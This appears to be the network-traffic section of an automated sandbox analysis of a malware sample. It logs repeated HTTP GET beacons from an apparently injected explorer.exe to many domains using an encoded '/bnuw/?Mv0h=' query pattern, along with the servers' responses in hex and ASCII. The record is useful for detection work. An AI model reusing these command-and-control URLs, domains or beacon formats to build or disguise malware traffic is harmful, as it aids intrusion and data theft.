                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                        X-TransIP-Backend: web870
                                                                                                                                                        X-TransIP-Balancer: balancer5
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 78 70 61 6e 64 2e 63 61 72 65 2f 62 6e 75 77 2f 3f 4d 76 30 68 3d 39 69 63 4c 35 44 62 74 50 42 32 61 73 31 5a 64 36 58 67 39 45 72 65 4e 63 47 38 35 68 6e 42 51 64 33 51 32 33 6b 54 65 68 62 53 2b 6a 6e 61 54 46 6f 4b 66 55 31 38 53 49 2f 47 39 75 76 48 34 32 61 6f 72 26 61 6d 70 3b 56 50 58 68 3d 47 68 49 48 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.expand.care/bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&amp;VPXh=GhIH">here</a>.</p></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        20192.168.2.5497633.13.31.21480C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:41:55.889050007 CET6290OUTGET /bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.purposelyproductivelab.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:41:56.048048973 CET6290INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Location: https://purposelyproductivelab.com/bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH
                                                                                                                                                        X-Redirector-Version: 2.15.3-9d502ae
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:41:55 GMT
                                                                                                                                                        Content-Length: 163
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 75 72 70 6f 73 65 6c 79 70 72 6f 64 75 63 74 69 76 65 6c 61 62 2e 63 6f 6d 2f 62 6e 75 77 2f 3f 4d 76 30 68 3d 48 39 65 46 4b 50 54 33 50 5a 36 2b 4a 45 75 6b 6d 6f 6c 34 49 61 6b 4d 37 52 6e 31 62 54 59 49 37 64 61 33 41 51 68 45 6d 5a 4f 54 77 74 58 66 6b 34 63 34 67 57 58 66 75 63 33 74 37 32 53 6d 55 36 65 66 26 61 6d 70 3b 56 50 58 68 3d 47 68 49 48 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                        Data Ascii: <a href="https://purposelyproductivelab.com/bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&amp;VPXh=GhIH">Moved Permanently</a>.


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        21192.168.2.5497643.0.139.11480C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:42:01.240537882 CET6291OUTGET /bnuw/?Mv0h=oQBageEfQvQWJFAXW9y7EEMDG11e2WOjQsYBS6rJpmc3XwkvfF+/+ZMtoN/tAF1fT0AC&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.ekpays.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:42:01.425765991 CET6291INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:42:01 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 154
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        22192.168.2.54976534.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:42:11.489057064 CET6292OUTGET /bnuw/?Mv0h=1oU/nMap4AbjDp4r952Rm+RiaAFKzBneYu9/CIGQRHecOlg44QcSF3Ws3nwJMctl1pZ6&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.beachesvr.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:42:11.631047964 CET6293INHTTP/1.1 403 Forbidden
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:42:11 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 275
                                                                                                                                                        ETag: "600b4d5c-113"
                                                                                                                                                        Via: 1.1 google
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        23192.168.2.549766192.249.115.16880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:42:16.833240032 CET6293OUTGET /bnuw/?Mv0h=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IjYd/OTLsCZ&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.secretlairtoys.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:42:17.116592884 CET6295INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:42:16 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Set-Cookie: PHPSESSID=60f7c33b83a16f22f346e83bb8308143; path=/; domain=.secretlairtoys.com
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,POST,PUT,DELETE,OPTIONS
                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: 0
                                                                                                                                                        Connection: close
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Data Raw: 33 64 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 54 6f 79 2d 41 69 73 6c 65 2e 63 6f 6d 20 2d 20 53 68 6f 70 20 66 6f 72 20 74 6f 79 73 2c 20 6e 6f 74 20 61 64 73 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 21 2d 2d 20 53 45 4f 20 4d 65 74 61 20 54 61 67 73 2d 2d 3e 0a 20 20 3c 21 2d 2d 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 61 72 74 7a 69 6c 6c 61 20 2d 20 42 6f 6f 74 73 74 72 61 70 20 45 2d 63 6f 6d 6d 65 72 63 65 20 54 65 6d 70 6c 61 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6f 6f 74 73 74 72 61 70 2c 20 73 68 6f 70 2c 20 65 2d 63 6f 6d 6d 65 72 63 65 2c 20 6d 61 72 6b 65 74 2c 20 6d 6f 64 65 72 6e 2c 20 72 65 73 70 6f 6e 73 69 76 65 2c 20 20 62 75 73 69 6e 65 73 73 2c 20 6d 6f 62 69 6c 65 2c 20 62 6f 6f 74 73 74 72 61 70 20 34 2c 20 68 74 6d 6c 35 2c 20 63 73 73 33 2c 20 6a 71 75 65 72 79 2c 20 6a 73 2c 20 67 61 6c 6c 65 72 79 2c 20 73 6c 69 64 65 72 2c 20 74 6f 75 63 68 2c 20 63 72 65 61 74 69 76 65 2c 20 63 6c 65 61 6e 22 3e 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 79 2d 41 69 73 6c 65 2e 63 6f 6d 22 3e 0a 20 20 3c 21 2d 2d 20 56 69 65 77 70 6f 72 74 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 61 6e 64 20 54 6f 75 63 68 20 49 63 6f 6e 73 2d 2d 3e 0a 20 20 3c 21 2d 2d 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f
                                                                                                                                                        Data Ascii: 3d8c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Toy-Aisle.com - Shop for toys, not ads.</title> ... SEO Meta Tags--> ... <meta name="description" content="Cartzilla - Bootstrap E-commerce Template"> <meta name="keywords" content="bootstrap, shop, e-commerce, market, modern, responsive, business, mobile, bootstrap 4, html5, css3, jquery, js, gallery, slider, touch, creative, clean"> --> <meta name="author" content="Toy-Aisle.com"> ... Viewport--> <meta name="viewport" content="width=device-width, initial-scale=1"> ... Favicon and Touch Icons--> ... <link rel="apple-touch-icon" sizes="180x180" href="apple-touch-icon.png"> <link rel="ico


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        24192.168.2.549767154.204.140.23380C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:42:22.651658058 CET6342OUTGET /bnuw/?Mv0h=sBaVa8kj+YCbP3U2o3QVtpVj9pzNwi4112+9WTWVNa3X8ft1LfuComp0EF+DLQnGsCaK&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.dmvantalya.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:42:22.952120066 CET6343INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:42:22 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                        Data Raw: 36 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 2f 6a 73 2f 77 77 64 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 69<html><head><script type='text/javascript' src='/js/wwd.js'></script></head><body></script></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        25192.168.2.54976846.38.226.4780C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:42:28.011893988 CET6343OUTGET /bnuw/?Mv0h=/+b+PR1HqbzITR/xPqvCXgD2JDomfeuYUy/NSf/Itxe+SMeGrZJLG9WamYt6TAOy7qnF&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.husum-ferienwohnungen.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:42:28.059879065 CET6345INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:42:28 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 1039
                                                                                                                                                        Connection: close
                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                        Last-Modified: Tue, 24 Feb 2015 16:29:52 GMT
                                                                                                                                                        ETag: "40f-50fd8074406b0"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 65 62 31 32 32 2e 73 65 72 76 65 72 30 31 2e 66 72 75 69 74 6d 65 64 69 61 2e 64 65 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69 6e 67 0a 20 20 20 2d 20 72 69 67 68 74 20 6e 6f 77 2e 0a 20 20 20 2d 2d 3e 0a
                                                                                                                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><BASE href="/error_docs/">...[if lte IE 6]></BASE><![endif]--></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><ADDRESS>Web Server at web122.server01.fruitmedia.de</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        3192.168.2.54973551.195.43.21480C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:40:07.924004078 CET5340OUTGET /bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.alliswell.info
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:40:07.984159946 CET5340INHTTP/1.1 302 Found
                                                                                                                                                        date: Wed, 27 Jan 2021 14:40:07 GMT
                                                                                                                                                        location: https://www.alliswell.info/bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH
                                                                                                                                                        content-length: 0
                                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                                        connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        4192.168.2.549736172.120.228.8880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:40:13.548455954 CET5341OUTGET /bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.czb878.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:40:13.742654085 CET5342INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:40:13 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 162
                                                                                                                                                        Connection: close
                                                                                                                                                        Location: https://www.czb878.com/bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        5192.168.2.549738192.0.78.2580C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:40:18.892349958 CET5348OUTGET /bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.brendonellis.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:40:18.935271025 CET5349INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:40:18 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 162
                                                                                                                                                        Connection: close
                                                                                                                                                        Location: https://www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH
                                                                                                                                                        X-ac: 2.hhn _dca
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        6192.168.2.5497393.13.31.21480C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 27, 2021 15:40:24.152700901 CET5353OUTGET /bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH HTTP/1.1
                                                                                                                                                        Host: www.purposelyproductivelab.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 27, 2021 15:40:24.288676977 CET5354INHTTP/1.1 301 Moved Permanently
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Location: https://purposelyproductivelab.com/bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH
                                                                                                                                                        X-Redirector-Version: 2.15.3-9d502ae
                                                                                                                                                        Date: Wed, 27 Jan 2021 14:40:24 GMT
